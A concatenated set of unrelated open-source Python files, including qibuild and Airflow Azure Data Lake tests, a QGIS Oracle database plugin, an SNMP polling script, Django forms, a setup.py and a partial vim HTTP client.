qibuild.config.add_build_config("foo", toolchain="foo")
qitoolchain_action("add-package", "-c", "foo", world_package)
build_worktree.worktree.remove_project("world", from_disk=True)
record_messages.reset()
qibuild_action.chdir("hello")
qibuild_action("configure", "-c", "foo")
qibuild_action("find", "--cmake", "world", "-c", "foo")
assert record_messages.find("WORLD_LIBRARIES")
def test_find_target_in_build_dir(qibuild_action, record_messages):
""" Test Find Target In Build Dir """
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
qibuild_action("configure", "hello")
qibuild_action("make", "hello")
record_messages.reset()
qibuild_action("find", "hello", "world")
assert record_messages.find(find.library_name("world"))
rc = qibuild_action("find", "hello", "libworld", retcode=True)
assert rc == 1
def test_find_target_in_toolchain_package(cd_to_tmpdir, record_messages):
""" Test Find Target In Toolchain Package """
qibuild_action = QiBuildAction()
qitoolchain_action = QiToolchainAction()
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
world_package = qibuild_action("package", "world")
qitoolchain_action("create", "foo")
qibuild.config.add_build_config("foo", toolchain="foo")
qitoolchain_action("add-package", "-c", "foo", world_package)
qibuild_action.chdir("hello")
qibuild_action("configure", "-c", "foo")
qibuild_action("make", "-c", "foo")
record_messages.reset()
qibuild_action("find", "world", "-c", "foo")
assert record_messages.find(find.library_name("world"))
record_messages.reset()
qibuild_action("find", "hello", "-c", "foo")
assert record_messages.find(find.binary_name("hello"))
rc = qibuild_action("find", "libeggs", "-c", "foo", retcode=True)
assert rc == 1
|
aldebaran/qibuild
|
python/qibuild/test/test_qibuild_find.py
|
Python
|
bsd-3-clause
| 3,244 | 0.000308 |
#!/usr/bin/python
import getpass
import snmp_helper
from snmp_helper import snmp_get_oid,snmp_extract
import yaml
DeviceIp1 = '184.105.247.70'
DeviceIp2 = '184.105.247.71'
SnmpPort = 161
sysNameOID = '.1.3.6.1.2.1.1.5.0'
sysDescOID = '.1.3.6.1.2.1.1.1.0'
#Connecting to the devices, using methods from getpass library
DeviceIp1 = raw_input("pynet-rtr1 IP address: ")
DeviceIp2 = raw_input("pynet-rtr2 IP address: ")
SnmpString = getpass.getpass(prompt="Community string: ")
#Creating a tuple for each device, consisting of the IP, SNMP string and SNMP port
SnmpDevice1 = (DeviceIp1, SnmpString, SnmpPort)
SnmpDevice2 = (DeviceIp2, SnmpString, SnmpPort)
#Creating a loop to cycle through each device's information, using the snmp_helper lybrary methods
for SnmpDevices in (SnmpDevice1, SnmpDevice2):
for OIDs in (sysNameOID, sysDescOID):
SnmpInformation = snmp_get_oid(SnmpDevices, oid=OIDs)
SnmpDescOutput = snmp_extract(SnmpInformation)
#Printing results to a yaml file
SmpFileOutput = 'SnmpInformation.txt'
with open(SmpFileOutput, "a") as f:
f.write(yaml.safe_dump(SnmpDescOutput, default_flow_style=False))
print "\nResults printed to a yaml file.\n"
|
brutalic/pynet_brutal
|
class2/GetSysNameDesc.py
|
Python
|
apache-2.0
| 1,227 | 0.007335 |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : DB Manager
Description : Database manager plugin for QGIS (Oracle)
Date : Aug 27, 2014
copyright : (C) 2014 by Médéric RIBREUX
email : mederic.ribreux@gmail.com
The content of this file is based on
- PG_Manager by Martin Dobias <wonder.sk@gmail.com> (GPLv2 license)
- DB Manager by Giuseppe Sucameli <brush.tyler@gmail.com> (GPLv2 license)
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
# this will disable the dbplugin if the connector raise an ImportError
from .connector import OracleDBConnector
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from ..plugin import ConnectionError, InvalidDataException, DBPlugin, \
Database, Schema, Table, VectorTable, TableField, TableConstraint, \
TableIndex, TableTrigger, TableRule
try:
from . import resources_rc
except ImportError:
pass
from ..html_elems import HtmlParagraph, HtmlList, HtmlTable
from qgis.core import QgsCredentials
def classFactory():
return OracleDBPlugin
class OracleDBPlugin(DBPlugin):
@classmethod
def icon(self):
return QIcon(":/db_manager/oracle/icon")
@classmethod
def typeName(self):
return 'oracle'
@classmethod
def typeNameString(self):
return 'Oracle Spatial'
@classmethod
def providerName(self):
return 'oracle'
@classmethod
def connectionSettingsKey(self):
return '/Oracle/connections'
def connectToUri(self, uri):
self.db = self.databasesFactory(self, uri)
if self.db:
return True
return False
def databasesFactory(self, connection, uri):
return ORDatabase(connection, uri)
def connect(self, parent=None):
conn_name = self.connectionName()
settings = QSettings()
settings.beginGroup(u"/{0}/{1}".format(
self.connectionSettingsKey(), conn_name))
if not settings.contains("database"): # non-existent entry?
raise InvalidDataException(
self.tr('There is no defined database connection "{}".'.format(
conn_name)))
from qgis.core import QgsDataSourceURI
uri = QgsDataSourceURI()
settingsList = ["host", "port", "database", "username", "password"]
host, port, database, username, password = map(
lambda x: settings.value(x, "", type=str), settingsList)
# qgis1.5 use 'savePassword' instead of 'save' setting
savedPassword = settings.value("save", False, type=bool) or \
settings.value("savePassword", False, type=bool)
# get all of the connexion options
useEstimatedMetadata = settings.value(
"estimatedMetadata", False, type=bool)
uri.setParam('userTablesOnly', unicode(
settings.value("userTablesOnly", False, type=bool)))
uri.setParam('geometryColumnsOnly', unicode(
settings.value("geometryColumnsOnly", False, type=bool)))
uri.setParam('allowGeometrylessTables', unicode(
settings.value("allowGeometrylessTables", False, type=bool)))
uri.setParam('onlyExistingTypes', unicode(
settings.value("onlyExistingTypes", False, type=bool)))
settings.endGroup()
uri.setConnection(host, port, database, username, password)
uri.setUseEstimatedMetadata(useEstimatedMetadata)
err = u""
try:
return self.connectToUri(uri)
except ConnectionError as e:
err = unicode(e)
# ask for valid credentials
max_attempts = 3
for i in range(max_attempts):
(ok, username, password) = QgsCredentials.instance().get(
uri.connectionInfo(False), username, password, err)
if not ok:
return False
uri.setConnection(host, port, database, username, password)
try:
self.connectToUri(uri)
except ConnectionError as e:
if i == max_attempts - 1: # failed the last attempt
raise e
err = unicode(e)
continue
QgsCredentials.instance().put(
uri.connectionInfo(False), username, password)
return True
return False
class ORDatabase(Database):
def __init__(self, connection, uri):
self.connName = connection.connectionName()
Database.__init__(self, connection, uri)
def connectorsFactory(self, uri):
return OracleDBConnector(uri, self.connName)
def dataTablesFactory(self, row, db, schema=None):
return ORTable(row, db, schema)
def vectorTablesFactory(self, row, db, schema=None):
return ORVectorTable(row, db, schema)
def info(self):
from .info_model import ORDatabaseInfo
return ORDatabaseInfo(self)
def schemasFactory(self, row, db):
return ORSchema(row, db)
def columnUniqueValuesModel(self, col, table, limit=10):
l = u""
if limit:
l = u"WHERE ROWNUM < {:d}".format(limit)
con = self.database().connector
# Prevent geometry column show
tableName = table.replace(u'"', u"").split(u".")
if len(tableName) == 0:
tableName = [None, tableName[0]]
colName = col.replace(u'"', u"").split(u".")[-1]
if con.isGeometryColumn(tableName, colName):
return None
query = u"SELECT DISTINCT {} FROM {} {}".format(col, table, l)
return self.sqlResultModel(query, self)
def sqlResultModel(self, sql, parent):
from .data_model import ORSqlResultModel
return ORSqlResultModel(self, sql, parent)
def toSqlLayer(self, sql, geomCol, uniqueCol,
layerName=u"QueryLayer", layerType=None,
avoidSelectById=False, filter=""):
from qgis.core import QgsMapLayer, QgsVectorLayer
uri = self.uri()
con = self.database().connector
uri.setDataSource(u"", u"({})".format(sql), geomCol, filter, uniqueCol.strip(u'"'))
if avoidSelectById:
uri.disableSelectAtId(True)
provider = self.dbplugin().providerName()
vlayer = QgsVectorLayer(uri.uri(False), layerName, provider)
# handling undetermined geometry type
if not vlayer.isValid():
wkbType, srid = con.getTableMainGeomType(
u"({})".format(sql), geomCol)
uri.setWkbType(wkbType)
if srid:
uri.setSrid(unicode(srid))
vlayer = QgsVectorLayer(uri.uri(False), layerName, provider)
return vlayer
def registerDatabaseActions(self, mainWindow):
action = QAction(QApplication.translate(
"DBManagerPlugin", "&Re-connect"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Database"), self.reconnectActionSlot)
if self.schemas():
action = QAction(QApplication.translate(
"DBManagerPlugin", "&Create schema"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Schema"), self.createSchemaActionSlot)
action = QAction(QApplication.translate(
"DBManagerPlugin", "&Delete (empty) schema"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Schema"), self.deleteSchemaActionSlot)
action = QAction(QApplication.translate(
"DBManagerPlugin", "Delete selected item"), self)
mainWindow.registerAction(action, None, self.deleteActionSlot)
action.setShortcuts(QKeySequence.Delete)
action = QAction(QIcon(":/db_manager/actions/create_table"),
QApplication.translate(
"DBManagerPlugin", "&Create table"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Table"), self.createTableActionSlot)
action = QAction(QIcon(":/db_manager/actions/edit_table"),
QApplication.translate(
"DBManagerPlugin", "&Edit table"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Table"), self.editTableActionSlot)
action = QAction(QIcon(":/db_manager/actions/del_table"),
QApplication.translate(
"DBManagerPlugin", "&Delete table/view"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Table"), self.deleteTableActionSlot)
action = QAction(QApplication.translate(
"DBManagerPlugin", "&Empty table"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Table"), self.emptyTableActionSlot)
class ORSchema(Schema):
def __init__(self, row, db):
Schema.__init__(self, db)
# self.oid, self.name, self.owner, self.perms, self.comment = row
self.name = row[0]
class ORTable(Table):
def __init__(self, row, db, schema=None):
Table.__init__(self, db, schema)
self.name, self.owner, isView = row
self.estimatedRowCount = None
self.objectType = None
self.isView = False
self.isMaterializedView = False
if isView == 1:
self.isView = True
self.creationDate = None
self.modificationDate = None
def getDates(self):
"""Grab the creation/modification dates of the table"""
self.creationDate, self.modificationDate = (
self.database().connector.getTableDates((self.schemaName(),
self.name)))
def refreshRowEstimation(self):
"""Use ALL_ALL_TABLE to get an estimation of rows"""
if self.isView:
self.estimatedRowCount = 0
self.estimatedRowCount = (
self.database().connector.getTableRowEstimation(
(self.schemaName(), self.name)))
def getType(self):
"""Grab the type of object for the table"""
self.objectType = self.database().connector.getTableType(
(self.schemaName(), self.name))
def getComment(self):
"""Grab the general comment of the table/view"""
self.comment = self.database().connector.getTableComment(
(self.schemaName(), self.name), self.objectType)
def getDefinition(self):
return self.database().connector.getDefinition(
(self.schemaName(), self.name), self.objectType)
def getMViewInfo(self):
if self.objectType == u"MATERIALIZED VIEW":
return self.database().connector.getMViewInfo(
(self.schemaName(), self.name))
else:
return None
def runAction(self, action):
action = unicode(action)
if action.startswith("rows/"):
if action == "rows/recount":
self.refreshRowCount()
return True
elif action.startswith("index/"):
parts = action.split('/')
index_name = parts[1]
index_action = parts[2]
msg = QApplication.translate(
"DBManagerPlugin",
"Do you want to {} index {}?".format(
index_action, index_name))
QApplication.restoreOverrideCursor()
try:
if QMessageBox.question(
None,
QApplication.translate(
"DBManagerPlugin", "Table Index"),
msg,
QMessageBox.Yes | QMessageBox.No) == QMessageBox.No:
return False
finally:
QApplication.setOverrideCursor(Qt.WaitCursor)
if index_action == "rebuild":
self.aboutToChange()
self.database().connector.rebuildTableIndex(
(self.schemaName(), self.name), index_name)
self.refreshIndexes()
return True
elif action.startswith(u"mview/"):
if action == "mview/refresh":
self.aboutToChange()
self.database().connector.refreshMView(
(self.schemaName(), self.name))
return True
return Table.runAction(self, action)
def tableFieldsFactory(self, row, table):
return ORTableField(row, table)
def tableConstraintsFactory(self, row, table):
return ORTableConstraint(row, table)
def tableIndexesFactory(self, row, table):
return ORTableIndex(row, table)
def tableTriggersFactory(self, row, table):
return ORTableTrigger(row, table)
def info(self):
from .info_model import ORTableInfo
return ORTableInfo(self)
def tableDataModel(self, parent):
from .data_model import ORTableDataModel
return ORTableDataModel(self, parent)
def getValidQGisUniqueFields(self, onlyOne=False):
""" list of fields valid to load the table as layer in QGis canvas.
QGis automatically search for a valid unique field, so it's
needed only for queries and views.
"""
ret = []
# add the pk
pkcols = filter(lambda x: x.primaryKey, self.fields())
if len(pkcols) == 1:
ret.append(pkcols[0])
# then add integer fields with an unique index
indexes = self.indexes()
if indexes is not None:
for idx in indexes:
if idx.isUnique and len(idx.columns) == 1:
fld = idx.fields()[idx.columns[0]]
if (fld.dataType == u"NUMBER"
and not fld.modifier
and fld.notNull
and fld not in ret):
ret.append(fld)
# and finally append the other suitable fields
for fld in self.fields():
if (fld.dataType == u"NUMBER"
and not fld.modifier
and fld.notNull
and fld not in ret):
ret.append(fld)
if onlyOne:
return ret[0] if len(ret) > 0 else None
return ret
def uri(self):
uri = self.database().uri()
schema = self.schemaName() if self.schemaName() else ''
geomCol = self.geomColumn if self.type in [
Table.VectorType, Table.RasterType] else ""
uniqueCol = self.getValidQGisUniqueFields(
True) if self.isView else None
uri.setDataSource(schema, self.name, geomCol if geomCol else None,
None, uniqueCol.name if uniqueCol else "")
# Handle geographic table
if geomCol:
uri.setWkbType(self.wkbType)
uri.setSrid(unicode(self.srid))
return uri
class ORVectorTable(ORTable, VectorTable):
def __init__(self, row, db, schema=None):
ORTable.__init__(self, row[0:3], db, schema)
VectorTable.__init__(self, db, schema)
self.geomColumn, self.geomType, self.wkbType, self.geomDim, \
self.srid = row[-7:-2]
def info(self):
from .info_model import ORVectorTableInfo
return ORVectorTableInfo(self)
def runAction(self, action):
if action.startswith("extent/"):
if action == "extent/update":
self.aboutToChange()
self.updateExtent()
return True
if ORTable.runAction(self, action):
return True
return VectorTable.runAction(self, action)
def canUpdateMetadata(self):
return self.database().connector.canUpdateMetadata((self.schemaName(),
self.name))
def updateExtent(self):
self.database().connector.updateMetadata(
(self.schemaName(), self.name),
self.geomColumn, extent=self.extent)
self.refreshTableEstimatedExtent()
self.refresh()
def hasSpatialIndex(self, geom_column=None):
geom_column = geom_column if geom_column else self.geomColumn
for idx in self.indexes():
if geom_column == idx.column:
return True
return False
class ORTableField(TableField):
def __init__(self, row, table):
""" build fields information from query and find primary key """
TableField.__init__(self, table)
self.num, self.name, self.dataType, self.charMaxLen, \
self.modifier, self.notNull, self.hasDefault, \
self.default, typeStr, self.comment = row
self.primaryKey = False
self.num = int(self.num)
if isinstance(self.charMaxLen, QPyNullVariant):
self.charMaxLen = None
else:
self.charMaxLen = int(self.charMaxLen)
if isinstance(self.modifier, QPyNullVariant):
self.modifier = None
else:
self.modifier = int(self.modifier)
if self.notNull.upper() == u"Y":
self.notNull = False
else:
self.notNull = True
if isinstance(self.comment, QPyNullVariant):
self.comment = u""
# find out whether fields are part of primary key
for con in self.table().constraints():
if (con.type == ORTableConstraint.TypePrimaryKey
and self.name == con.column):
self.primaryKey = True
break
def type2String(self):
if (u"TIMESTAMP" in self.dataType
or self.dataType in [u"DATE", u"SDO_GEOMETRY",
u"BINARY_FLOAT", u"BINARY_DOUBLE"]):
return u"{}".format(self.dataType)
if self.charMaxLen in [None, -1]:
return u"{}".format(self.dataType)
elif self.modifier in [None, -1, 0]:
return u"{}({})".format(self.dataType, self.charMaxLen)
return u"{}({},{})".format(self.dataType, self.charMaxLen,
self.modifier)
def update(self, new_name, new_type_str=None, new_not_null=None,
new_default_str=None):
self.table().aboutToChange()
if self.name == new_name:
new_name = None
if self.type2String() == new_type_str:
new_type_str = None
if self.notNull == new_not_null:
new_not_null = None
if self.default2String() == new_default_str:
new_default_str = None
ret = self.table().database().connector.updateTableColumn(
(self.table().schemaName(), self.table().name),
self.name, new_name, new_type_str,
new_not_null, new_default_str)
# When changing a field, refresh also constraints and
# indexes.
if ret is not False:
self.table().refreshFields()
self.table().refreshConstraints()
self.table().refreshIndexes()
return ret
class ORTableConstraint(TableConstraint):
TypeCheck, TypeForeignKey, TypePrimaryKey, \
TypeUnique, TypeUnknown = range(5)
types = {"c": TypeCheck, "r": TypeForeignKey,
"p": TypePrimaryKey, "u": TypeUnique}
def __init__(self, row, table):
""" build constraints info from query """
TableConstraint.__init__(self, table)
self.name, constr_type_str, self.column, self.validated, \
self.generated, self.status = row[0:6]
constr_type_str = constr_type_str.lower()
if constr_type_str in ORTableConstraint.types:
self.type = ORTableConstraint.types[constr_type_str]
else:
self.type = ORTableConstraint.TypeUnknown
if isinstance(row[6], QPyNullVariant):
self.checkSource = u""
else:
self.checkSource = row[6]
if isinstance(row[8], QPyNullVariant):
self.foreignTable = u""
else:
self.foreignTable = row[8]
if isinstance(row[7], QPyNullVariant):
self.foreignOnDelete = u""
else:
self.foreignOnDelete = row[7]
if isinstance(row[9], QPyNullVariant):
self.foreignKey = u""
else:
self.foreignKey = row[9]
def type2String(self):
if self.type == ORTableConstraint.TypeCheck:
return QApplication.translate("DBManagerPlugin", "Check")
if self.type == ORTableConstraint.TypePrimaryKey:
return QApplication.translate("DBManagerPlugin", "Primary key")
if self.type == ORTableConstraint.TypeForeignKey:
return QApplication.translate("DBManagerPlugin", "Foreign key")
if self.type == ORTableConstraint.TypeUnique:
return QApplication.translate("DBManagerPlugin", "Unique")
return QApplication.translate("DBManagerPlugin", 'Unknown')
def fields(self):
""" Hack to make edit dialog box work """
fields = self.table().fields()
field = None
for fld in fields:
if fld.name == self.column:
field = fld
cols = {}
cols[0] = field
return cols
class ORTableIndex(TableIndex):
def __init__(self, row, table):
TableIndex.__init__(self, table)
self.name, self.column, self.indexType, self.status, \
self.analyzed, self.compression, self.isUnique = row
def fields(self):
""" Hack to make edit dialog box work """
self.table().refreshFields()
fields = self.table().fields()
field = None
for fld in fields:
if fld.name == self.column:
field = fld
cols = {}
cols[0] = field
return cols
class ORTableTrigger(TableTrigger):
def __init__(self, row, table):
TableTrigger.__init__(self, table)
self.name, self.event, self.type, self.enabled = row
|
SebDieBln/QGIS
|
python/plugins/db_manager/db_plugins/oracle/plugin.py
|
Python
|
gpl-2.0
| 22,853 | 0.000131 |
import glob
import os
import shutil
from distutils import sysconfig
from setuptools import setup, Command
from setuptools.command.install import install
here=os.path.dirname(os.path.abspath(__file__))
site_packages_path = sysconfig.get_python_lib()
class CleanCommand(Command):
"""Custom clean command to tidy up the project root."""
CLEAN_FILES = './build ./dist ./*.pyc ./*.tgz ./*.egg-info'.split(' ')
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
global here
for path_spec in self.CLEAN_FILES:
# Make paths absolute and relative to this path
abs_paths = glob.glob(os.path.normpath(os.path.join(here, path_spec)))
for path in [str(p) for p in abs_paths]:
if not path.startswith(here):
# Die if path in CLEAN_FILES is absolute + outside this directory
raise ValueError("%s is not a path inside %s" % (path, here))
print('removing %s' % os.path.relpath(path))
shutil.rmtree(path)
long_description="""
pyhotreload allows you to patch a system while it is running.
"""
setup(
name='pyhotreload',
version='0.0.1',
description='patch a system while its running',
long_description=long_description,
cmdclass={
'clean': CleanCommand,
},
url='https://github.com/mdsitton/pyHotReload/',
author='Matthew Sitton',
author_email='matthewsitton@gmail.com',
license='',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
#'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
],
# What does your project relate to?
keywords='hot reload',
install_requires=[],
packages=['hotreload'],
)
|
stuaxo/pyHotReload
|
setup.py
|
Python
|
bsd-2-clause
| 2,321 | 0.004308 |
import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.compliance_objects import ComplianceBuilding
log = logging.getLogger(__name__)
class TestComplianceBuilding(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_compliancebuilding(self):
pyidf.validation_level = ValidationLevel.error
obj = ComplianceBuilding()
# real
var_building_rotation_for_appendix_g = 1.1
obj.building_rotation_for_appendix_g = var_building_rotation_for_appendix_g
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertAlmostEqual(idf2.compliancebuildings[0].building_rotation_for_appendix_g, var_building_rotation_for_appendix_g)
|
rbuffat/pyidf
|
tests/test_compliancebuilding.py
|
Python
|
apache-2.0
| 1,041 | 0.003842 |
#!/usr/bin/env python3
"""
Open csv file with each a list. All the row-lists are contained in a list. In
preparation for entry into the database the data is cleaned. This includes
validating the headers and striping and lowering the values.
"""
import csv
HEADERS = ['case number', 'case occurred from date', 'case occurred incident type', 'case ori',
'case subject age', 'case subject custody status', 'case subject global subject',
'case subject global subject address', 'case subject global subject address apartment',
'case subject global subject address city', 'case subject global subject address state',
'case subject global subject address zip',
'case subject global subject date of birth',
'case subject global subject primary phone number',
'case subject global subject race', 'case subject global subject sex',
'case subject type', 'reporting district']
def open_csv(path):
# Open the csv file lower and strip all the values. Make sure the csv is
# expect format.
with open(path) as csvfile:
reader = list(csv.reader(csvfile, delimiter=','))
rows = [[val.strip().lower() for val in row] for row in reader]
if rows.pop(0) != HEADERS:
return False
return rows
def write_receipt(path, rows):
# Write the receipt to csv file.
with open(f'{path}/receipt.csv', 'w') as f:
writer = csv.writer(f)
writer.writerows(rows)
def main():
pass
if __name__ == '__main__':
main()
|
scott48074/Restorative-Justice-App
|
app/csv_handler.py
|
Python
|
mit
| 1,556 | 0.003856 |
from django import forms
from registration.forms import RegistrationForm
from django.contrib.auth.models import User
from models import UserProfile
from models import *
class Registration(RegistrationForm):
picture = forms.ImageField(required=False)
bio = forms.CharField(widget=forms.Textarea(),required=False)
date_of_birth = forms.DateField(input_formats=['%d/%m/%Y'],required=False)
GENDER_CHOICES = (
("Male", "Male"),
("Female", "Female"),)
gender = forms.ChoiceField(widget=forms.RadioSelect,
choices=GENDER_CHOICES,required=False)
class UserForm(forms.ModelForm):
username = forms.CharField(required=False)
class Meta:
model = User
fields = ('username','email',)
class UserProfileForm(forms.ModelForm):
GENDER_CHOICES = (
("Male", "Male"),
("Female", "Female"),)
gender = forms.ChoiceField(widget=forms.RadioSelect,
choices=GENDER_CHOICES,required=False)
class Meta:
model = UserProfile
fields = ('picture','bio','gender')
class ParagraphForm(forms.ModelForm):
content = forms.CharField(max_length=200, help_text="Write your paragraph!")
choices = (
(True, 'yes'),
(False, 'no'))
end = forms.ChoiceField(choices=choices, widget=forms.RadioSelect)
class Meta:
model = Paragraph
exclude = ('story', 'parent', 'author','created_datetime')
class StoryForm(forms.ModelForm):
title = forms.CharField(max_length=100, help_text='Title', required = True)
#category = forms.ModelChoiceField(queryset=Category.objects.all().order_by('title'), help_text = "Category", required = True)
cat = forms.CharField(required = True)
text = forms.CharField(max_length=140, help_text="First Paragraph", required = True)
class Meta:
model = Story
exclude = ('created_datetime', 'author', 'slug', 'category')
|
RetroMelon/PatchWords
|
patchwords_project/patchwords/forms.py
|
Python
|
mit
| 1,944 | 0.013374 |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import json
import unittest
from airflow import configuration
from airflow import models
from airflow.utils import db
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
class TestAzureDataLakeHook(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
db.merge_conn(
models.Connection(
conn_id='adl_test_key',
conn_type='azure_data_lake',
login='client_id',
password='client secret',
extra=json.dumps({"tenant": "tenant",
"account_name": "accountname"})
)
)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_conn(self, mock_lib):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
from azure.datalake.store import core
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
self.assertEqual(hook.conn_id, 'adl_test_key')
self.assertIsInstance(hook.connection, core.AzureDLFileSystem)
assert mock_lib.auth.called
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.core.AzureDLFileSystem',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_check_for_blob(self, mock_lib, mock_filesystem):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.check_for_file('file_path')
mock_filesystem.glob.called
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.multithread.ADLUploader',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_upload_file(self, mock_lib, mock_uploader):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.upload_file(local_path='tests/hooks/test_adl_hook.py',
remote_path='/test_adl_hook.py',
nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
mock_uploader.assert_called_once_with(hook.connection,
lpath='tests/hooks/test_adl_hook.py',
rpath='/test_adl_hook.py',
nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.multithread.ADLDownloader',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_download_file(self, mock_lib, mock_downloader):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.download_file(local_path='test_adl_hook.py',
remote_path='/test_adl_hook.py',
nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
mock_downloader.assert_called_once_with(hook.connection,
lpath='test_adl_hook.py',
rpath='/test_adl_hook.py',
nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.core.AzureDLFileSystem',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_list_glob(self, mock_lib, mock_fs):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.list('file_path/*')
mock_fs.return_value.glob.assert_called_with('file_path/*')
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.core.AzureDLFileSystem',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_list_walk(self, mock_lib, mock_fs):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.list('file_path/some_folder/')
mock_fs.return_value.walk.assert_called_with('file_path/some_folder/')
if __name__ == '__main__':
unittest.main()
|
malmiron/incubator-airflow
|
tests/contrib/hooks/test_azure_data_lake_hook.py
|
Python
|
apache-2.0
| 5,649 | 0.00354 |
import json
import re
import requests
from_cmdline = False
try:
__file__
from_cmdline = True
except NameError:
pass
if not from_cmdline:
import vim
METHOD_REGEX = re.compile('^(GET|POST|DELETE|PUT|HEAD|OPTIONS|PATCH) (.*)$')
HEADER_REGEX = re.compile('^([^()<>@,;:\<>/\[\]?={}]+):\\s*(.*)$')
VAR_REGEX = re.compile('^# ?(:[^: ]+)\\s*=\\s*(.+)$')
GLOBAL_VAR_REGEX = re.compile('^# ?(\$[^$ ]+)\\s*=\\s*(.+)$')
FILE_REGEX = re.compile("!((?:file)|(?:(?:content)))\((.+)\)")
JSON_REGEX = re.compile("(javascript|json)$", re.IGNORECASE)
verify_ssl = vim.eval('g:http_client_verify_ssl') == '1'
def replace_vars(string, variables):
for var, val in variables.items():
string = string.replace(var, val)
return string
def is_comment(s):
return s.startswith('#')
def do_request(block, buf):
variables = dict((m.groups() for m in (GLOBAL_VAR_REGEX.match(l) for l in buf) if m))
variables.update(dict((m.groups() for m in (VAR_REGEX.match(l) for l in block) if m)))
block = [line for line in block if not is_comment(line) and line.strip() != '']
if len(block) == 0:
print('Request was empty.')
return
method_url = block.pop(0)
method_url_match = METHOD_REGEX.match(method_url)
if not method_url_match:
print('Could not find method or URL!')
return
method, url = method_url_match.groups()
url = replace_vars(url, variables)
url = url.strip()
headers = {}
while len(block) > 0:
header_match = HEADER_REGEX.match(block[0])
if header_match:
block.pop(0)
header_name, header_value = header_match.groups()
headers[header_name] = replace_vars(header_value, variables)
else:
break
data = [ replace_vars(l, variables) for l in block ]
files = None
if all([ '=' in l for l in data ]):
# Form data: separate entries into data dict, and files dict
key_value_pairs = dict([ l.split('=', 1) for l in data ])
def to_file(expr):
type, arg = FILE_REGEX.match(expr).groups()
arg = arg.replace('\\(', '(').replace('\\)', ')')
return open(arg, 'rb') if type == 'file' else (arg)
files = dict([(k, to_file(v)) for (k, v) in key_value_pairs.items() if FILE_REGEX.match(v)])
data = dict([(k, v) for (k, v) in key_value_pairs.items() if not FILE_REGEX.match(v)])
else:
# Straight data: just send it off as a string.
data = '\n'.join(data)
if not verify_ssl:
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
json_data = None
if headers.get('Content-Type') == 'application/json':
json_data = json.loads(data)
